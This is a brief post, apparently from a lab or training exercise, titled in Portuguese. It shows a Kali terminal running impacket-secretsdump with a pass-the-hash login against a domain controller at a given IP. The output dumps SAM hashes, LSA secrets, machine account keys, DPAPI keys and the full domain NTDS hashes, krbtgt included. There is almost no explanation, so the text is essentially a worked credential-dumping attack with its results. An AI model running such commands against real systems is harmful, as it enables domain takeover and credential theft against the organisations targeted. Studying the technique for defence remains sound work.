Utilizando Impacket-secretsdump

kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 admin@spartancybersec.corp -hashes :64fbae31cc352fc26af97cbdef151e03
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x6819873eadf71f0789285138af013772
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC 
SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4
SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4
SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920
SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9
dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18
[+] Looking into NL$KM
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_uAKYyEam
[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500 
[+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::